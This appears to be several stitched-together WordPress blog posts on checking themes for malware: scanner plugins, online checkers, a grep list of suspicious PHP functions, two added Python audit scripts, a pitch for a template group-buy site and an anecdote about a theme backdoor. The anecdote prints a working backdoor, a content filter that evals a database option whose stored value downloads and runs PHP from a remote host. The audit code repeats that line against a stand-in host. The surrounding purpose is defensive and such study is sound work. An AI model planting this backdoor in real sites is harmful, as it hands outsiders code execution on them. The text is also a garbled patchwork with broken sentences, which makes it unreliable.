Check the template for malicious code. How to change a WordPress template to suit yourself: checking the template layout according to SEO rules


WordPress is the most popular engine for creating various information websites and blogs. The security of your website is more than the security of your data. This is much more important, because it is also the safety of all users who read and trust your resource. This is why it is so important that the site is not infected with viruses or any other malicious code.

We will look at how to protect WordPress from hacking in one of the following articles, but now I want to tell you how to check a WordPress website for viruses and malicious code to make sure that everything is safe.

The first option that comes to mind is that hackers broke into your site and planted backdoors in its code so they can send spam, insert links and do other bad things. This does happen, but it is quite rare if you update your software on time.

There are thousands of free WordPress themes and plugins, and this alone can be a threat. It is one thing to download a template from the WordPress site and quite another to pick it up from some shady site. Unscrupulous developers can embed malicious code in their products. The risk is even higher if you download premium templates for free: there, hackers risk nothing by adding a security hole through which they can later get in and do whatever they need. This is why checking a WordPress site for viruses is so important.

Checking a WordPress site for viruses

The first thing to turn to when checking a site for viruses is WordPress plugins. Quickly and easily, you can scan your site and find suspicious areas of code that deserve attention, whether they are in a theme, a plugin or the WordPress core itself. Let's look at a few of the most popular plugins:

1. TAC

This very simple plugin checks all themes installed on your site for malicious code. It detects hidden links obfuscated with base64 insertions and shows detailed information about the problems found. Most often the pieces of code it finds are not viruses, but they can potentially be dangerous, so they deserve attention.

Open "Appearance" -> "TAC" and wait until all themes are checked.

2. VIP Scanner

Very similar to the TAC theme scanner, but shows more detailed information. It has the same capabilities for detecting links, hidden code and other malicious inserts. Just open the VIP Scanner item in the tools section and analyze the result.

Sometimes it is enough to delete unnecessary files such as desktop.ini; in other cases you need to look more closely at what the files that use base64 actually do.

3. Anti-Malware from GOTMLS.NET

This plugin lets you not only scan the themes and core of the site for viruses but also protect the site from password brute-forcing and various XSS and SQL injection attacks. The search is based on known signatures and vulnerabilities, and some vulnerabilities can be fixed on the spot. To start scanning files, open "Anti-Malware" in the side menu and click "Run Scan":

Before you can run a scan, you need to update your signature databases.

4. Wordfence

This is one of the most popular plugins for WordPress security and malware scanning. Besides the scanner, which can find most backdoors planted in WordPress code, it provides constant protection against various types of attacks and password brute-forcing. During the scan the plugin finds possible problems with plugins and themes and reports when WordPress needs updating.

Open the "Wordfence" tab in the side menu, then go to the "Scan" tab and press "Start Scan":

The scan may take some time, but when completed, you will see a detailed report of the problems found.

5. AntiVirus

This is another simple plugin that will scan your website template for malicious code. The disadvantage is that only the current template is scanned, but the information is displayed in sufficient detail. You will see all the dangerous functions that are in the theme and then you can analyze in detail whether they pose any danger. Find an item "AntiVirus" in settings and then click "Scan the theme templates now":

6. Integrity Checker

It is also advisable to check the integrity of the WordPress files, in case a virus has already written itself into them somewhere. For this you can use the Integrity Checker plugin. It checks all core, plugin and template files for changes, and at the end of the scan shows you which files have changed.

Online services

There are also several online services that allow you to check a WordPress site for viruses or check just the template. Here are some of them:

themecheck.org - you upload the theme archive and see all the warnings about possibly malicious functions used in it. You can view information not only about your own theme but also about themes uploaded by other users, including different versions of the same theme. Anything the plugins can find, this site will find too. Checking your WordPress theme this way is also very important.

virustotal.com - a well-known resource where you can check your website or template file for viruses.

ReScan.pro - scanning a WordPress site for viruses with this service is free; it performs static and dynamic analysis to detect possible redirects, actually opens the site's pages, and checks the site against various blacklists.

sitecheck.sucuri.net - a simple service for scanning sites and themes for viruses. There is a WordPress plugin. Detects dangerous links and scripts.

Manual check

Nothing beats a manual check. Linux has the wonderful grep utility, which searches for occurrences of arbitrary strings in a folder of files. It remains to decide what we will be looking for:

  • eval - this function executes arbitrary PHP code and is not used by self-respecting products; if a plugin or theme uses it, there is almost a 100% probability that it contains a virus;
  • base64_decode - encoding functions can be used together with eval to hide malicious code, but they also have peaceful uses, so be careful;
  • sha1 - another function used to obfuscate malicious code;
  • gzinflate - a decompression function, used for the same purpose together with eval, for example gzinflate(base64_decode($code));
  • strrev - reverses a string; can be used as a primitive form of obfuscation;
  • print - outputs information to the browser; dangerous in combination with gzinflate or base64_decode;
  • file_put_contents - WordPress itself or plugins may legitimately create files in the file system, but if a theme does this you should be wary and check why, because a virus may be writing itself to disk;
  • file_get_contents - mostly used for peaceful purposes, but can be used to download malicious code or read information from files;
  • curl - the same story;
  • fopen - opens a file, possibly for writing, and you never know for what purpose;
  • system - executes a command on the Linux system; if a theme, plugin or WordPress itself does this, there is most likely a virus there;
  • symlink - creates symbolic links; the virus may be trying to make the main file system reachable from the outside;
  • copy - copies a file from one place to another;
  • getcwd - returns the name of the current working directory;
  • cwd - changes the current working folder;
  • ini_get - reads PHP settings, often for peaceful purposes, but you never know;
  • error_reporting(0) - disables the output of any error messages;
  • window.top.location.href - JavaScript expression used for redirects to other pages;
  • hacked - just in case, we check whether the hacker decided to tell us himself.

You can substitute each individual word into a command like this:

grep -R "hacked" /var/www/path/to/files/wordpress/wp-content/

Or use a simple script that will search for all words at once:

values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
copy(
eval(
system(
symlink(
error_reporting(0)
print
file_get_contents(
file_put_contents(
fopen(
hacked"

cd /var/www/path/to/files/wordpress/wp-content/
# each line of $values is a separate fixed-string pattern (-F); -n prints line numbers
grep -nrF --include='*.php' "$values" .
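The same checklist as a small scanner, added here as an example and not part of the original article: it walks wp-content, matches each line of every .php file against the groups of functions above, and ranks a hit by the combination found on the line rather than by a single keyword. The PHP files it scans are constructed samples written to a temporary directory, and the base64 blobs in them are placeholders, not payloads.

```python
"""Scan wp-content for the suspicious PHP constructs listed above and rank each hit."""
import os
import re
import tempfile
from dataclasses import dataclass

# The fixed strings from the manual-check list, grouped by role. A bare "print" is a
# word-bounded match so that printf()/sprintf() in clean themes do not flood the report.
_RAW_GROUPS = {
    "exec":     ["eval(", "system("],
    "decode":   ["base64_decode(", "gzinflate(", "strrev(", "chr(ord(", "sha1("],
    "file_net": ["file_get_contents(", "file_put_contents(", "fopen(", "curl", "copy(", "symlink("],
    "env":      ["getcwd(", "cwd", "ini_get", "error_reporting(0)"],
    "output":   ["print"],
    "redirect": ["window.top.location.href"],
    "marker":   ["hacked"],
}
GROUPS = {name: [re.compile(r"\bprint\b" if p == "print" else re.escape(p)) for p in pats]
          for name, pats in _RAW_GROUPS.items()}
# A long run of base64 alphabet characters is how obfuscated payloads usually look.
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")


@dataclass
class Finding:
    path: str
    lineno: int
    groups: list
    severity: str
    line: str


def classify(groups: set, line: str) -> str:
    """Rank by the combination of constructs on one line, not by a single keyword."""
    if "exec" in groups:
        return "high"      # eval()/system(): treated above as a near-certain infection
    if "decode" in groups and ("output" in groups or LONG_B64.search(line)):
        return "medium"    # decode a blob and echo it: the usual hidden-link injector shape
    if groups & {"marker", "redirect"}:
        return "medium"
    return "low"           # file/env functions have legitimate uses; review these by hand


def scan_text(text: str, path: str = "<memory>") -> list:
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        groups = {name for name, rxs in GROUPS.items() if any(rx.search(line) for rx in rxs)}
        if groups:
            findings.append(Finding(path, lineno, sorted(groups), classify(groups, line), line.strip()))
    return findings


def scan_tree(root: str) -> list:
    """Walk root (e.g. wp-content) and scan every .php file, dot-directories included."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), path))
    return findings


# Constructed samples (not real theme code): one legitimate use, one decode-then-execute
# dropper, one decoded blob written into the page. The blobs are placeholders, not payloads.
SAMPLES = {
    "clean.php": "<?php\n"
                 "$css = file_get_contents(get_template_directory() . '/style.css');\n"
                 "printf('%s', esc_html($css));\n",
    "infected.php": "<?php\n"
                    "error_reporting(0);\n"
                    "eval(gzinflate(base64_decode('bm90IGEgcmVhbCBwYXlsb2Fk')));\n",
    "links.php": "<?php\n"
                 "print(base64_decode('" + "QUFB" * 20 + "'));\n",
}


def demo() -> dict:
    """Write the samples to a temp dir, scan it, and map file name -> severities in line order."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "themes", "sample")
        os.makedirs(theme)
        for name, body in SAMPLES.items():
            with open(os.path.join(theme, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        findings = scan_tree(root)
    report = {}
    for f in findings:
        report.setdefault(os.path.basename(f.path), []).append(f.severity)
    return report


if __name__ == "__main__":
    for name, severities in demo().items():
        print(name, severities)
```

Point scan_tree at a real wp-content directory to get the same report for your own site.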

Hello, dear readers of the blog site. Nowadays there are few webmasters who design their website themselves (using pure Html, their own engine, or at least using self-created templates for the CMS). In general, this is true, because not everyone is able to create something worthwhile - this requires the talent of a designer. Most often it turns out to be at least “not very good”, and sometimes “simply terrible”.

That is why templates, or design themes (different engines use different terms for “skins”), for popular CMSs have become so widespread. There are especially many of them on the Internet for Joomla and WordPress, because these are deservedly the most popular engines both in RuNet and abroad.

In fact, there are already quite a few Russian-language resources with catalogs of ready-made templates, and abroad there are more than anyone can count. Everything seems wonderful: install the engine, find a suitable template (it is no secret that paid templates are not that hard to find for free), download it and enjoy the professional design of your new website. All that remains is to add valuable content and watch the popularity of your resource grow.

But not everything is so simple and obvious. After I wrote an article a long time ago, I regularly received emails from readers recommending that I remove this or that service from the list, because the templates posted there contained hidden links or even viruses. It turns out the proverb is true: free cheese is only found in a mousetrap. Developers of free templates (or those who “null” paid ones) simply make money this way and, judging by the scale, a lot of it.

Hidden links to third-party (and often blacklisted by search engines) resources, and even more so viruses, can kill all hopes of promoting your resource (or seriously undermine them and spoil your nerves). For this you can, either. How can you protect yourself from all this when choosing a template?

What's wrong with free templates for Joomla and WordPress?

From my own experience I can say that it is very difficult for an “amateur” to compete with a “professional”. At the very beginning of this publication, I provided a link to an article about viruses that infected most of my sites. This happened more than two years ago, and during this time I have repeated the epic struggle for “code purity” more than once, but relapses still occur with enviable regularity on a number of infected resources (either spam is sent from them, or a doorway is formed, then something completely incomprehensible to me is happening, leading to a monstrously large load on the hosting).

At the same time, I use all the methods available to a “noob” to search for shells and other backdoors in the code of these sites, but again, I repeat that an amateur simply cannot compete with a pro. Therefore, if you think that you can easily remove a virus that has sneaked through a template, then most likely you are mistaken. This is a very dreary, terribly annoying matter (when viral activity, despite all your efforts, appears again and again) and takes a lot of time and effort.

The same applies to hidden links. You are lucky if you come across an old-school way of inserting them, where you can simply find the insertion point and get rid of them forever, ending up with a clean and free template. In most cases everything is much more complicated. To find where the hidden links are inserted you will need software (for example, the TAC plugin), but it is not omnipotent, because the business of distributing links through free and paid (cracked) templates for Joomla and WordPress brings in very good income, which pushes those who practice it to look for new solutions that make their “implant” less noticeable.

In fact, today it can be quite difficult even to quickly check a template for injected links. For example, you downloaded a template, installed it on the site, added content and decided to check whether any suspicious external links (not placed by you) had appeared. There are none. You are happy, forget about the problem, get busy filling and promoting the site, and then suddenly you discover (on your own, or after a signal from the search engines in the form of a filter or a ban) that there are hidden links after all, and they lead to such “muck” that you would never even think of linking to.

The most offensive part is that removing the filter and “whitewashing” the site in the eyes of the search engines can take a very long time (months and even years in some cases). The point is that the developers of such “implants” know that you are aware of them and check the site after installing the template for all sorts of nastiness. So they delay the start of link generation for some time, long enough in their opinion for even the most suspicious user to believe in the purity of the template he got for free.

Moreover, hidden links are now encoded so that they cannot be found by searching for the words md5 or base64 (often they are loaded from an external source). Just a set of letters and special characters that cannot be found by searching through all the template files, of which there may be more than a hundred. Plus, the links do not appear immediately. That is, there is virtually no way for an average webmaster to detect them at the stage of website creation.

Well, to avoid infection through the template, I prefer to pay money so as not to deal with a bunch of problems later. Another matter is that you can pay a lot of money, or not very much. I personally choose the second option, but first I will explain the essence of the first.

Something, of course, can be found in the official repositories of these engines (I wrote about that, and there is also the official Joomla extensions site), but, firstly, the choice there is significantly limited, and secondly, many thousands of other sites around the world will be dressed in the same “clothes”, which somewhat reduces the uniqueness of your project both in the eyes of visitors and in the eyes of search engines.

However, there are many professional companies in the world that develop paid templates for Joomla and WordPress. A priori, they should not have implants, otherwise they would instantly lose the authority and trust of their clients. But the price of one template can be 50-100 dollars, depending on its functionality and novelty.

In addition, some problems with payment may arise (you will have to either take a risk and make a purchase with payment directly from a plastic card). However, as a result you will receive a deliberately “clean” template, which is good. True, the technical support that comes with it will be relevant only if you know the language in which it is provided. In most cases, knowledge of the Russian language will not help you in this matter.

I like the second option better because of its higher profitability (the ratio of money spent to opportunities received), although towards the developers it is not entirely “clean”. Its essence is that Joomla and WordPress are distributed under the GNU/GPL license, i.e. a free-software license (such software can be used, copied, modified and distributed). I already wrote about this in the article about Joomla templates mentioned at the very beginning.

Without going into too much detail, the point is that extensions (templates, plugins, etc.) for these engines cannot be the private property of the authors. Yes, you can demand payment for them, but it will no longer be possible to punish or prosecute for unauthorized use or distribution of these extensions. Despite this, the market for paid extensions for Joomla and WordPress is huge, although not protected by copyright law. On the contrary, the GNU/GPL license 100% protects you from the developer.

Many development companies, by the way, provide access to their templates by subscription. That is, you pay a certain amount and for a certain time you can download, and afterwards keep using, all their creations (templates or extensions). The second way to safely obtain WordPress themes and Joomla templates is based on roughly the same principle.

Not long ago a friend of mine, whom I have mentioned in a number of articles, pointed me to it (he has been looking for the ideal option for building an online store for several years now, and along the way he finds many things that seem interesting to me and which I then actively use). We are talking about the premium template and extension pool CmsHeaven.org.

The essence of a group buy is quite simple: a product is bought and distributed to everyone who chipped in. CmsHeaven.org has simplified the scheme even further: there is no need to pay for the individual templates or extensions you need. You simply pay for temporary access to the entire catalog the service has at its disposal (several thousand titles, divided by engine, author and topic for ease of searching).

Each of the products offered was honestly purchased from the developers with the contributors' money (there are also free templates, but again from well-known brands that need them for advertising purposes). Importantly, the organizers constantly update the catalog with new items (hot off the press, as they say), which would otherwise take a long time to appear in public. Many people will like this.

In general, this is a cooperative that you can join and enjoy all the benefits, with some restrictions. The organizers are well aware that without restrictions their entire catalog would be leaked to the public in no time, so there is a limit of 36 downloads per month. This is quite enough for an ordinary webmaster, and even for a website-building company.

This guarantees that the extensions and templates offered contain no “implants” (hidden links, viruses, Trojans and snitches that report to the developer which site uses their template). With this in mind, only open-source products from well-known brands are purchased, where all of this can be checked and, if necessary, removed.

Some of the extensions have been translated into Russian, and there is support if problems arise with installation or configuration, which is often very necessary (you have probably combed the Internet more than once in search of a solution to a problem that arose out of the blue). By the way, this is what distinguishes free engines from paid ones: there is no user support as such.

And you will be able to download the products you like at normal speed and without viewing advertisements on file hosting services. It’s a trifle, because to get the coveted “cute” you can move mountains, and not just fight with a file hosting service, but it’s the trifles that make up comfort.

In general, I really liked the idea and its implementation, but should I use free templates from the Joomla and WordPress repositories, should I join in on CmsHeaven.org or buy templates directly from the developers? you'll have to decide for yourself. Just “I beg you, don’t eat raw tomatoes at night,” that is, don’t download free products from any “wonderful” resources, because you can end up with a lot of problems. Do you need it?

Good luck to you! See you soon on the pages of the blog site


One of the most important steps when creating a blog is choosing a high-quality template. There are many sites, both paid and free. However, you need to be careful here, since there is a high probability of receiving viruses, malicious scripts and hidden links along with the file.

But even if the template is clean in terms of security, and you are completely satisfied with its design, usability and functionality, this does not mean that everything is in order. The theme must have valid HTML and CSS code, and also comply with all WordPress CMS standards. Even paid themes and custom-made templates have problems with the latter.

Engine developers are constantly developing it, and template authors do not always keep up with them, using outdated functions when creating them.

Today I will show you 2 ways to check WordPress themes for standards compliance. These are the tools used when themes are submitted to the official directory https://wordpress.org/themes/

Service for checking WordPress themes and Joomla templates for compliance with standards

ThemeCheck.org is a free service that allows you to check the safety and quality of templates for CMS WordPress and Joomla before installing them on your website.

To check a theme, upload its archive from your computer by clicking the “Select file” button on themecheck.org. If you do not want the scan results to be stored on the service and visible to other users, check “Forget uploaded data after results”. Now click the “Submit” button.

For example, I took the Interface theme, which I downloaded from the official website. 99 out of 100: 0 critical errors and 1 warning. This is a very good result.

In comparison, my blog template received a score of 0 (14 errors and 23 warnings). I think for many the results will not be much different, especially if the theme is already outdated. All notes with explanations, indicating the files and lines where they were found, are on the same page below.

Frankly, I didn’t understand much there; it would be more useful for authors, and it’s easier for me to change the template than to fix everything. I just don’t know when I’ll decide to do this.

On the home page there is a large selection of previously tested WordPress and Joomla themes, which can be sorted by date added or rating. Clicking on one shows detailed information and links to the author's website and download page.

If you are a developer and your theme is 100% valid, you can inform users about this by installing a special badge with a rating on it.

The value of ThemeCheck.org service is that any webmaster can use it to select a high-quality theme before installing it on the blog.

Theme Check plugin

You can check an already installed template for compatibility with the latest WordPress standards using the Theme Check plugin. Link to download the latest version: https://wordpress.org/plugins/theme-check/

The functionality of the plugin is similar to the service I described above. There is no need to make any settings after standard installation and activation. Check procedure:

  1. Go to the admin panel to the menu page “Appearance” – “Theme Check”.
  2. Select the desired theme from the drop-down list if you have several installed.
  3. Check the “Suppress INFO” checkbox if you do not want to send information.
  4. Click the “Check it” button.

The results will be shown on the same page.

As you can see, even the default Twenty Ten theme is not ideal, while Twenty Fourteen, for example, has no errors.

After checking, the plugin can be disabled, or better yet, removed completely until next time.

Conclusion. Before installing a new WordPress template, check it not only for hidden links and malicious code with the TAC plugin, but also with ThemeCheck.org service or Theme Check plugin for compliance with the latest CMS standards.

P.S. Recently, while browsing TopSape Reader, I saw a new SEO blog, zenpr.ru, which holds 1st place among bloggers in terms of clicks per month. Considering that it is just over a month old, the result is worthy of respect. The design is minimalist, if not to say non-existent, but what the author writes, you will read. All to the point and without water, just like the blog's motto: “zero extra characters.” I recommend reading it; you will find a lot of useful information.

Hello friends. Are you sure that the free WordPress template you use for your websites and blogs is truly safe and does not contain hidden threats or malicious code? Are you completely sure about this? Absolutely?)

You think you ran the template through , removed hidden links from it, and the job is done. You periodically scan the site's files with an antivirus, look into the Security tab of the Yandex webmaster tools and are relieved to see the message: “No malicious code was detected on the site”.

That's what I thought too. I wouldn't like to upset you, but...

Hidden Dangerous Code in Free WordPress Templates

This is the letter I received last week by email from my hosting company. Recently, they have introduced a regular check of all site files to look for malicious content, and they did find this content on me!

It all started when I went to my website one afternoon and could not load it: a nasty message popped up about a file with the php extension not being found. Somewhat tense, I went to study the contents of the site folder on the hosting and immediately discovered the problem: my template file functions.php had been renamed to functions.php.malware, which hinted fairly unambiguously that an antivirus had been at work here, or something like that) Going to my mail, I found the above report from the hoster.

The first thing I did, of course, was start checking this file, studying its contents, scanning it with all kinds of antiviruses, dozens of online virus checking services, etc. — in the end, nothing was found, everyone unanimously asserted that the file was completely safe. Of course, I expressed my doubts to the hoster, saying that you had messed something up, but just in case, I asked them to provide a report on the detection of a malicious piece of code.

And this is what they answered me

I went to google information about this code and thought seriously...

How to find a piece of malicious code in a template

As it turns out, this is a truly non-trivial technique that allows interested parties to transmit data to your site and change the contents of pages without your knowledge! If you are using a free template, then I highly recommend checking your functions.php for the following code:

add_filter('the_content', '_bloginfo', 10001);   // hooks post content output with a very late priority
function _bloginfo($content) {
    global $post;
    // on single post pages, execute whatever PHP is stored in the 'blogoption' row of wp_options
    if (is_single() && ($co = @eval(get_option('blogoption'))) !== false) {
        return $co;          // replace the real content with the result
    } else return $content;
}

Even with my very shallow knowledge of PHP, it is clear that a certain filter is being created, tied to the global variable post and content, which are responsible for displaying content only on blog post pages (the is_single condition). Already suspicious isn't it? Well, now let’s see what this code is going to display on our website.

The interesting option blogoption requested in the database also looks very suspicious. We go into our MySQL database and find a table there called wp_options, if you did not change the prefixes then it will look like this by default. And in it we find the line that interests us called blogoption

What a beauty! We see the following option value:

return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

That is, content is returned from some third-party site (a Russian one, mind you), and it can contain anything: any number of links, malicious code, altered text, etc. When you open that site itself, it returns a 403 access error, which is not surprising. Of course, I also removed this option from the database.

According to information from victims, the exact content of your article is usually returned with only one modification - instead of any dot “.” an open link was hidden in the text! And by the way, this option is written to the database when the template itself is installed, and then the code that does this successfully self-destructs. And I lived with such rubbish for two years, and not a single antivirus or service identified this threat to me in all that time. To be honest, I didn’t notice if this trick ever worked for me, or if my security plugin blocked this feature (or maybe one of the WordPress updates closed this hole), but it’s still unpleasant.
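The two checks just described, the filter in functions.php and the row in wp_options, as an added example that is not code from the original post: it looks for a the_content filter whose callback runs eval(get_option(...)) and flags option values that contain PHP constructs. The functions.php text and option rows are constructed, an in-memory SQLite table stands in for MySQL, and the remote host is a placeholder.

```python
"""Audit a theme's functions.php and the wp_options table for the eval-a-DB-option backdoor."""
import re
import sqlite3

# A the_content filter registration and its callback name.
CONTENT_FILTER = re.compile(r"add_filter\(\s*['\"]the_content['\"]\s*,\s*['\"](\w+)['\"]")
# The dangerous core of the snippet above: executing whatever a wp_options row contains.
EVAL_OPTION = re.compile(r"@?eval\(\s*get_option\(\s*['\"](\w+)['\"]")
# Option values are data; any of these inside one means stored code.
CODE_IN_OPTION = re.compile(
    r"eval\(|file_get_contents\(\s*['\"]https?://|base64_decode\(|gzinflate\(")


def _function_body(src: str, name: str) -> str:
    """Return the body of function `name` by counting braces (good enough for an audit)."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def audit_functions_php(src: str) -> list:
    """(callback, option_name) for every the_content filter that evals a DB option."""
    hits = []
    for callback in CONTENT_FILTER.findall(src):
        for option in EVAL_OPTION.findall(_function_body(src, callback)):
            hits.append((callback, option))
    return hits


def audit_options(rows) -> list:
    """rows: (option_name, option_value) pairs, i.e. the result of
    SELECT option_name, option_value FROM wp_options. Returns (name, construct) for code."""
    hits = []
    for name, value in rows:
        m = CODE_IN_OPTION.search(value or "")
        if m:
            hits.append((name, m.group(0)))
    return hits


# Constructed functions.php modelled on the snippet above: one harmless filter, one backdoor.
FUNCTIONS_PHP = """<?php
add_filter('the_content', 'add_signature');
function add_signature($content) {
    return $content . '<p>Thanks for reading.</p>';
}
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content) {
    global $post;
    if (is_single() && ($co = @eval(get_option('blogoption'))) !== false) {
        return $co;
    } else return $content;
}
"""

# Constructed wp_options rows; the remote host is a placeholder, not the one from the post.
OPTION_ROWS = [
    ("siteurl", "https://blog.example", "yes"),
    ("blogname", "My blog", "yes"),
    ("active_plugins", 'a:1:{i:0;s:19:"akismet/akismet.php";}', "yes"),
    ("blogoption", "return eval(file_get_contents('http://attacker.example/aksimet.php?id='"
                   ".$post->ID.'&m=47&n'));", "yes"),
]


def demo() -> dict:
    """Load the rows into an in-memory SQLite stand-in for MySQL and run both audits."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, "
               "option_value TEXT, autoload TEXT)")
    db.executemany("INSERT INTO wp_options (option_name, option_value, autoload) VALUES (?, ?, ?)",
                   OPTION_ROWS)
    # The same query works unchanged against the real MySQL wp_options table.
    rows = db.execute("SELECT option_name, option_value FROM wp_options").fetchall()
    return {"functions_php": audit_functions_php(FUNCTIONS_PHP), "options": audit_options(rows)}


if __name__ == "__main__":
    print(demo())
```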

Moral about free cheese

How do you like the sophistication of our “translators” of templates (or those who post them in their catalogs)? This is not for you to cut out links from the footer) It’s a pity I don’t remember where I downloaded my template from, it was a long time ago, otherwise I would definitely have written a couple of affectionate ones. And if at that time I had the same experience that I have now, I definitely would not have used a free template, or, in extreme cases, would not have downloaded it from unknown sources!

It’s easier to buy some official premium template for 15-20 bucks and live in peace, knowing that there are no holes or encrypted links in it, and even if there are vulnerabilities, the developers will definitely release an update in which these holes will be closed. ( By the way, Artem recently published an article where he talks about premium templates and even gives out promotional codes for brutal discounts for those who are interested)

Hello IdeaFox friends!

I don’t know about you, but I have trouble sleeping at night. I am tormented by blog security issues. I have no strength anymore :-)

I read a bunch of blogs on this topic and tested many plugins that help solve this problem. And in the comments they began to ask questions about the topic of site protection, which prompted me to write this note.

Just imagine that you keep a blog, write articles, try... And evil assholes come and break your site. I think there will be a lot of grief.

After all, every normal blogger invests a lot of time and effort into the development of his website. And for many, blogging generally becomes an obsession... Here and until, if THIS happens :-)

Well, you understand how important this is.

Let's finally get down to business :)

A couple of months ago I already wrote a note about hacking. Be sure to read it. But quite a lot of time has passed since then and I took additional measures to strengthen the all-round defense.

In the following notes I will definitely dwell on this issue in detail. (I also remember and write about ISP settings)

3. Check the site on other online services

There are no shortage of such services. I have a strong opinion that many of them are completely stupid and created solely for displaying advertising.

Doctor Web

The company Dr.Web has made a good service for checking sites online. Personally, it once helped me find an infection on a friend's blog (there was third-party code in the .htaccess file).

The check is very simple. Enter your URL and wait for the verification result.

antivirus-alarm.ru

A powerful website scanner that uses as many as 43 antivirus databases from the world's leading antivirus companies.

Everything is very simple here too. We enter the URL of our site and wait with bated breath for the scan results.

I've been waiting for these.

Everything is clean, you can sleep peacefully :-)

All this is good, of course, but you also need to install a couple of plugins that won’t hurt at all for WordPress blogs.

4. Ask your host to check your site

The fact is that hosters are even more concerned about security issues than you and have powerful security measures. Moreover, with specialized means of protection.

This is the news I have for you today. Next, I will tell you about a very powerful plugin that can significantly protect your WordPress blog from hacking.

I have already been working with him for 2 months and am very pleased with him. While I figured it out, I banned myself 3 times: –) In short, there is something to tell.